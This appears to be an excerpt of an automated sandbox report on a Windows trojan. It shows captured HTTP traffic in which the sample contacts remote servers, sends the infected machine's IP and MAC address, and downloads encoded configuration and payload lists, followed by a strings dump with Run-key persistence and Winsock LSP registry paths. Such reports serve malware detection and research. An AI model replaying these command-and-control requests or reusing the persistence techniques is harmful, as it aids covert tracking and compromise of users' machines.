nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzIbqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>
GET /desk/cfg.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 275
Accept-Ranges: bytes
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 04:49:11 GMT
Last-Modified: Fri, 27 Mar 2015 03:31:20 GMT
ETag: "5514cf08-113"
Expires: Sun, 05 Apr 2015 04:49:11 GMT
Cache-Control: max-age=86400
Age: 50667
Powered-By-ChinaCache: HIT from 060320b3SX
[ico].num=3.[0].Ico_min=178.Ico_max=178.name=.........url=hXXp://g.2ksm.com/s/1/999/23903.html?uid=505519.[1].Box=0.Ico_min=190.Ico_max=190.name=.........url=hXXp://uimg.1qwe3r.com/mrcode.php?ai=50511.[2].Box=0.Ico_min=180.Ico_max=189.name=.........url=hXXp://ico1.fdc321.comt>....
GET /desk/ico/178.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:37:34 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 08 Jan 2015 09:44:44 GMT
ETag: "54ae518c-423e"
Expires: Sun, 05 Apr 2015 03:37:34 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54965
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ..............................................)@..(?g.(?..*@..*>..-?...?..!3...$......."...............(..*?..!8.......)........................................................................................................................................f.....................................;^..'?h.(@..'?..$=..&>..*>..*?..(?..,@..,@..(@..!:...6..";..&=..'>...=...7...-....................................................................................................................................................h.........................Kz..:^..3S..7Z..Fq..T...V.."b.. q..,w..(z..&w..%q.."q..#q.."s...e...O...C...3x...8...&... ...*...&...".............................................................................. ....$................................................................."a...Q...M}..V.."j..'...&.../...&...1...8...;...@...2...#...)........s...[...>...-x..)m..&].."S.."K...C...<...*...'...&...#... ................................................... ..(5.............................."..."......................................%i.h!d..#l..(}.. ...-... ...-...,...).../...-...-...8...7...9...D...;o..%Q...F...K...M...6...&i..$V.. K...@...7...*...*...,...,...0...3...-...%... ........................../W..-I..............."..*>..1F../@..1<..19.../..($..#.....................h........,w..*|..,.../.......,... ...-...-...*...%...'...,...-.../...1...3...?...Q...K...*f..!^...R...5...)u..&\.."N..#I...;...<...@...@.. A.. B...;...3.......-...0........
<<< skipped >>>
GET /desk/ico/190.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:50:29 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 12 Feb 2015 06:55:50 GMT
ETag: "54dc4e76-423e"
Expires: Sun, 05 Apr 2015 03:50:29 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54191
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......B......................................0ET-..,..%F..d...~...................................................................................................................................................................................~...b...7W...'...%0....................................Mo..If..............2...'g...Dd..Bl..Q..!S...Ou..a~..q..D...4...#...,...(...*.../...-.......#.......................................(...(.../...1...3...%...........6...4...&...X...9....Wx..[~..Xw..[y..o...............2U..(,.........................:f.*. >..:^.........................CSv...'.CSv.0?`...6............. GS.0Pa.Dn..............`...........................7...........T............&;.................W....DZ.........f.........J..&A...4..'F.. 6.. 1.......;..........?V...... "-.............a...1T..v.......@\...).Vl~................../P.6Hh.r.....8... .....$3:..26.X{...............CT.."4.................C....m...|..X...p...k.......s....2I..&9.@Xr.........Dn...@S.`.......................@g....9... ... ..! ......)).Pu.......^...... .&..........D`..Go......6[..&=...,...&.-GT.X~..............9Tw......"8...&.JZb...".->B.(AM..3E.. ?.."7.. ?...@.g........... ^}..b...k..1...9...'z...........F_..:S..(>.../.../.."5..1=..=L."DQ.i...^w..................n....C[..!7...)...%.....t|~../K......Ge.#.!......=W0.Ah......<f..(G...7...4...(...%.$EU..............3M.Pv....!...*..%-..... 38..!,.../...'..%8..6P..7O..H\.^..../I.'j..`...`...D...p...>....e..<{..'Xz..-A..&9...%...#.......(.
<<< skipped >>>
GET /desk/ico/184.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 07:24:58 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Tue, 27 Jan 2015 08:43:08 GMT
ETag: "54c74f9c-423e"
Expires: Sun, 05 Apr 2015 07:24:58 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 41322
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......@..................### ###4###H###Z###r###.###.""".###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.##$.##%.##%.##%.$$'.$$'.$$(.%%).%%*.''..''/.('0.))2.**5. *7., :.-,=..-?.0/B.0/C.20F.21H.43L.64N.96S.@=_.HElvPMxh_Z.Zoi.J.}.>###6###N###p###./%*.?&0.E'0.F(1.G)2.H)2.H)2.I*3.J*3.J*3.K*4.K*2.L 3.L 4.M 4.M 4.N,4.N,4.O,4.O-4.P-5.P,4.P,4.P,3.Q,4.Q-4.Q-5.R-5.R-5.Q-5.Q-5.P,4.Q-5.P-6.P-7.Q.8.P-7.P.8.P-9.P.;.P.;.P.<.P.=.P.>.P.@.Q.A.Q/B.Q0D.Q0F.Q0F.P0G.P/H.O/H.K.J.;/J.55Q.EBh.RO}pb].\yr.J###H"##t1$*.b&9..(D..-K..3P..7T..9V..;X..<W..>Z..?Y..@[..A\..B[..B[..CZ..E\..F]..G]..G]..H]..H]..I]..I]..J]..K]..K]..L^..M_..M_..M_..L_..L_..L^..L_..K_..J`..J_..J_..Ia..J`..Ia..Ia..Ha..Gb..Fb..Gd..Fe..Fe..Ef..Df..Ce..Af..?d..:b..4_../X.l-Q.@3Q.GDl.ZU.nmg.Z###^6$*.~ ;..$C..,J..3P..8V..<Y..?\..A^..C^..D_..D]..F_..G`..G^..H_..I`..Ja..Ka..Kb..K`..Mb..Mb..Na..Oa..Pa..Pb..Pa..Pb..Qb..Rc..Qb..Qc..Qb..Qc..Qd..Qc..Pd..Pd..Od..Od..Ne..Of..Ng..Ng..Mg..Mh..Mi..Lj..Mj..Lk..Kl..Jl..Hl..Fj..Bh..;d..3_..*Y..(U.H5Y.SO~.ga.h %).t.8...=..(F..1N..7T..=Z..B]..D`..Fa..Ga..Ic..Ib..Jc..Kc..Lc..Mc..Nd..Od..Pd..Pe..Qd..Qd..Re..Se..Sf..Td..Ue..Ud..Ud..Ue..Ve..Ue..Ue..Ve..Vf..Uf..Ug..Ug..Uh..Uh..Tg..Si..Tj..Tk..Sk..Sl..Sm..Sn..Rn..So..Ro..Qq..Pp..Or..Lp..Hm..Bj..9c..0]..$W..(W.LDn.c^.tL"3...7.."@..,K..4R..;X..A_..Ea..Hd..Id..Kf..Lf..Me..Ng..Nf..Of..Pg..Qg..Sh..Sh..Sh..Sh..Uh..Uh..Vh..Wg..Vf..Wh..Xh..Xh..Xh..Zh..Yh..Yh..Yi..Yj..Xh..Yj..Yk..Xk..Xl..Xk..Wm..Xn.
<<< skipped >>>
GET /plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Sat, 04 Apr 2015 18:52:49 GMT
Content-Type: application/octet-stream
Content-Length: 1687
Connection: close
Expires: Sat, 04 Apr 2015 18:52:49 GMT
Cache-Control: max-age=0
....<.......`.......X..HXO>B..........................,......T..mz3nU....J..&jG..KCW...O.m8s09j?`h?m<$R.....................................................................................v...`....g.{.U.%..O..e......................./.........................................................O^EL..%7<m0-Ck.,GW.p...`U..~-.".~. -.....9.....5-:hyFXNjm,qh5.` .......................................................................n...........Q...Y..?..U.................... ..................................................ff4pb7l{2)Y.^ {..her^........Y#.........3.c.....>mz(9..JB.(t>...p,...f.5$X.f3#LOV..[Gz5|w($u4$oQ_.[Y..x28/5`dV.6j.....j...tf..h..I@....^.M........er../w1(c...Cdon....h4....19*t?.{k$..A.Bls.tv6H.'7*mewg<p..X..._Q...rj:i.".J......h...h>....J......YX....u....'Xzh2z(g/77*,<v?`Rm4............................................................j..........UU....'.&Pw......he.YCqy9..IUXNf%.LK`5.............................................................h....,......W'...i..2N.0.......................4............................................................f...$...JH.......=@.8.Q.....Ã >&.KNlls0%JKuq.3...STDrsz4mj u&;<7jG8%s=:.=(t1)}mr|(T....f?1y(0=%2}Dv......c.......wS:.)<.Q.ktQ.E......ycQ..7k)....Zd8k2...!.5$X.fx=;8/tdJA.ki%;p9".NL.RCV. 4`{=%(;-x>$RGb[Br.....r...`%!.Vd.HnYa..GW.........:u.W...Q@Y.w30}8).x\b>u ...E._.WJ.XEMY.]./kf%.>y.OD{'}~jT.S.X...L.Cz$.....-93$8wu$>K.Z.udDX....@..'...y...[.u....(..............-................................................
<<< skipped >>>
GET /txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:29 GMT
Content-Type: text/plain
Content-Length: 943732
Last-Modified: Fri, 03 Apr 2015 10:02:43 GMT
Connection: close
ETag: "551e6543-e6674"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLAARuVDFElV4lEjSkzOz/kAlpGS VxJ6wCxq3njHLHGDrSpd4t9GUG/XenWQ2aIx2jsui0o8oZPf LOn2ww/Npy2/VNK6uLArY 2DOaLZnkRwmT/bQFdsn0vTxPrhlCcFy k 20AuZlNpLR5W3egF9UDl Z5p lIkp5QaoNWO/91c1pXUqdcHQR1dHg92w1v/LGlOT0VJAnJ36Js9TQHPrsujnxEp37 HoD5p/PsyBOfMwDGEoMtRE5ky9HGzVzp2Oj9/H/lH7C6KbqybZ8CFAAC pK9yNnlse88CyAWsKq19UQycMmZKWFjKsOwfP4K/6iD9wJ7Q56a76E0//4vK0u/k5TIUnKG9bYZGLV4s1PfX/O4rQwerqn4jIePUlfjQi7CkoCiNgdta2vxUFTm9wh1nz0osLYhQnt4il0RRuD6aN0TYaR3XP6XeBJFn9uuoFBmIvo/wiM6gBmct5GdqTfYBe7DnRXLQtZgVvPcKlAIkefOq5hEex1DN eLPXJa2a7bghgMlW7mipls1mJHc9ys4/xs 9meRS3JrCz1veY7nhfcNRYLXROExXv1iYv6H WhriQyigJVizQXrcet8OpvLBHz2fi2n7hNNq286slic3Vd8/gntSCmepuWtO7BES 6SzN5DNTolAKPUQ4qj4b0 U0pb5crra/r/mz/jOnC KIhUoLtqKkssNOWnRvjyTUoNWVN4A0pbpyHrxR6tC8OcT3RwWMW6/n6qNjk30mm3OARwLBhlR5oaMFHGYkFxgWqvFgeDRDL7zL6f/FuMd4R Iq6EE2YHT2ed7WtaL5Un MmEmt7WfYsbNq14DBberjBkyE7HHNExPF2vULtCIHA1P0yh12RkIe 8Tt8oBpNsEa1DMhJUop/jxtH1Ny2d9l/ELtGCOteiO9lMcs552QIUMfhXfFegIzdf3kHKizDVJa5b0guBCq40ru1AQKUlim2dLDDLQEHl4NaJfMzZkWqoQJS5WZoSI634lqP3IeRpPe/wCtnfZw6NqhAfAo5rXb1SP1lTTXFsU69YlE6i0dfomz1NAc uxYI7knJsBotL9vUWdQMPNxD9xMIdLl1wSPq9U7sIHH9NvNQlxdA0qVKIPEpO Off6RBAeAGR1Wnmntsj/CxA6g1enx CBeybNbpcjLWBG62lzyGFUYDXvo7Q71lU9iWi6TDFgNKi3yp9Sott3AI5 M281CXF0DSpWgGKc8YJkZNEoMU2ddoj8MIAcZrtk/HfiCp9o3sgQnA4Y/L2IrekaSXG5AHOfPhajoVqg8YfVY3NJKUsceCuFZzEKdCo4H8TnNJhxH3 uueYJ/GG6CXRUzPYwhIxxG 0nt7ewSAOl4BiiVTPgfum562uZCJljJXaUDZOOUBVYyUtBkC9 1LadbFH/j9zrQCwkudOuqG3c 8270rQ16n/dwiQ27OB4y9G /I0/ooFLXIncYYvJ TUIb6oo9QRCtQJDRnPxQd8p2io6k riaE8UE
<<< skipped >>>
GET /txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:32 GMT
Content-Type: text/plain
Content-Length: 671336
Last-Modified: Sat, 04 Apr 2015 13:58:36 GMT
Connection: close
ETag: "551fee0c-a3e68"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIATI0j4FGOPHCp5fsPM5bcpV9gVv8YkHx4yvOvi PhjnvseNCjxbHglVJKEsfQC1ZE3OCWcvzQbmwCDTQERo7OM0Dsq9ls0obQpmD2yxPW1UfPcgCHpTPb8Y2RJ4h/W/IUoPzmCxZDs116MO2q4P28tueyzvM3jq1nHFshfdphDeIwHThmFssE0A1Pr4qHrkZJuBKno3KVx3e0jT3j7ZHTLmq9Cl15DrYBrHijmrQsV7P5Z v11HmVz3qARYsHSgvX2p93mW75tcyo4i4cXSuNqV4XlCaXso7ucBG/H8fRAKUsrrkw9cIameaUKTw7jvW91i66L0GHh4/uwcqQAzybLIfRfffCP/ 17vZdFfb6am/3VfiqTYvvjyZX3zDmv9KP2Ld4kfjefKFmYzZb1buJgIcHQNVbkQZmMyyQo6vEiUh7DzU7sPkgD2j rwITlxQHJ3qG7Rpz96fvejf3yKyAB2Jt SMsvYR0z2VvfIf8bxWNgKAWXbaeVELwBRK8y4wi4j24JjQJjG7u1Xpc5BtwjuJa5ySDSOGD1cslwsCTpfSGIAzrg5HBpIqJBlEkioafCimRbx22nlRC8AUSnBowDXDoKSEdNfCrOXZCTq4Sj4Di7/mMhRuCyyHdlaqmF5IXbe8jUOlHkCWEyyB8EbpRg6Mp331mmV3Mb 5zbyPLM3/6iQm5UrxEOLXuVD1r1u6bdoOojUF7Y6WmItj5oHy6K2rbfQog/by257LO8xjNEqzdFfuTWr7rSlxGJXdF7APbjAq bJRB7Gd653cwvAQvd9Aa1auBq3HUOen06T f/tYFXf2j6SEdPZ1RXXp X/ILlgTB/IlcGyaRE855xyxyNcTnnljCMeXNabM6EJtexlvw0QqHfPaDkpX7FoA8KoHVtopXClCn/RU3pLqM2LFIgz7JD72wxKdPaxzM4BkCNtiAICqlEO9OfJCW577Zvn28WWptiBje 20jAcFOdEoP/5MnsYKUfxNU8niCc1p2iz2nuCC6kPvRXzm0N73Yp5 Wk57QxbMGb 5UsBy5EfQBl7W0q6ItuztwyIIngRqIHDtl90EbCKrd5G62qqT6akyZfoWywKcMQLBRp1gDmKeflpOe0MWLAEQt8baZ6xH0AZe1tKuiKUeQJYTLIHwH57K0OgyuqQtwICxpqtm1hJB1xQGpBMP/Ju6HhpnFOGGPy9iK3pGknANK6Jryn2TRHfgDB5emdpinn5aTntDFuMoeDl4A2Iby8vtL8r1JM6l/brt2HMUr3SctnX3LoYwJhyjVKOZ2dAWzEnlu9MIT0hDq2HuubrbVburqa5rTZvM58h61Wi7LMlaegKszfeg3DPXFjbdvLYgZ9Xj4X6coUWXdkdHVcKFAFG8WoEkDEEvH//zIJYifeY8DthlBxGVGj3DhG0P1ayqqY8pjKyF3WEs13BbTHXtW1dtOpfjV9LmwbmiS xQvfa5RqidBudg
<<< skipped >>>
GET /txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:20 GMT
Content-Type: text/plain
Content-Length: 1160544
Last-Modified: Wed, 01 Apr 2015 09:48:49 GMT
Connection: close
ETag: "551bbf01-11b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIP fm 1kX2EpoHPH5y5fSneWMVIcz20hnNCxGkQAG516OSetD3NWwIMVujg9tENOcBTmBWb 7G4WvM1YMoYBR1n/05aTY1HqnuPhzq4dW5N1TlrsSqOdfLX98HF1wgyOXjTHacUFiklRw1yD51UqgiV0AoG /mZXPE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxIR1SJjLO74XPdg0 sDpLF95oztb rsJOq s8Ysjc2A1NnrHs9IEB3ze0Rrwsy6d8uXJyfQNpBOtYm ARi1SoBtib4BGLVKgG2aGS9/2lLN2w/TTJNbMs336wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtxVTKO98tU Ulb6xRQPYFcxNrNDZlI WvE2s0NmUj5axzbXR wlUOd1udoPMpY2p/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrQFU4iLP8df/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr0E5EPM10K1G5zDifOE4dhzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWRFLQzZfoQutxncZxUXidxxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW69CtAj1kY2R5672j5HZoq8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWC8u eJPQb0XAiYgGUqBt3rE2s0NmUj5a qSnCa1jASD 8BgGQTR5rUy /T2K3JHIn9Bu0mkYE 2xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpK2E0E4cxijhRTosG6X1WJKNGbDqOkocKG/Y20xSgdf/GrTzUSVsP2Z2R5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRViFvkyNjI9EkZX9CUqPKznL5y1ptSZhF6sYrYY HE8uCwOxCHfECwTHNJHVo7OQn5LioQCSs4YA
<<< skipped >>>
GET /txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:22 GMT
Content-Type: text/plain
Content-Length: 398688
Last-Modified: Fri, 26 Sep 2014 07:22:57 GMT
Connection: close
ETag: "54251451-61560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLCp18hqxqUIH4hxrH2ruxBV4YQeeGJ65c5wsyHzRsh93kB/WAmaBgr2iApK/YyECWTZc3fHJpIC6vUQIdftw8fH Vki2LxKVQX QpVKPU/IIqA08 jlafX7oH6YXj9Lg9vljEjQvyO2cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a X5Vy1wuSR9dgNryH0CP/d9OaA4pTXvaLuA FC6PJMNxIkW4hj6Qlxo55q3drEIlgh1fMm3K29506aW9b6VGbm/H8aJaRsqeb8fxolpGyp0Wl 66XOXiKtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrKF9xt0oWC4pNX9iA4EJt cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a3r6RMlL8piAxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 4Z HXUJYjwhZJR2tCFCa1xNrNDZlI WsxOHUkBOoRd2lephKWY2T1OF1I1jh1m7N8KoHU8nB51sTazQ2ZSPlr6pKcJrWMBIP1qhO0HLK1lqHsBdnJ2u6Qm0Tw5nyxlSrE2s0NmUj5a3C2I9Jaq5QiP0ady7illlhKe0c7qPxslDsLwTz3lb30xNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
MainPro.exe_604:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
RSSSSSSh
RSSSSSSh
FtPh"
FtPh"
FtPh,
FtPh,
u'SSh |B
u'SSh |B
Hx.SHx
Hx.SHx
Uxs.Ux
Uxs.Ux
bx,IfxkFfxÿx
bx,IfxkFfxÿx
%s (%s:%d)
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
psapi.dll
psapi.dll
games.exb
games.exb
UserIP.ipb
UserIP.ipb
ntdll.dll
ntdll.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
x-x-x-x-x-x
x-x-x-x-x-x
serverport
serverport
clientport
clientport
\BCmain.exe
\BCmain.exe
cnkftpserver
cnkftpserver
hXXp://%s/main_ad.html
hXXp://%s/main_ad.html
ad%d.func2.cn
ad%d.func2.cn
KERNEL32.DLL
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AnnxePro.exe
AnnxePro.exe
MainPro.exe
MainPro.exe
\mswnsock.dll
\mswnsock.dll
\mswinsock.dll
\mswinsock.dll
%H,%A,%S,%B,%d,%D,%M,%m,%Y
%H,%A,%S,%B,%d,%D,%M,%m,%Y
%s\$sctemp%d.tmp
%s\$sctemp%d.tmp
SYSTEM\CurrentControlSet\Services\WinSock2\TCPIPSH
SYSTEM\CurrentControlSet\Services\WinSock2\TCPIPSH
%u.%u.%u
%u.%u.%u
IeImgSnd.dll
IeImgSnd.dll
IEXPLORE.exe
IEXPLORE.exe
iexplore.exe
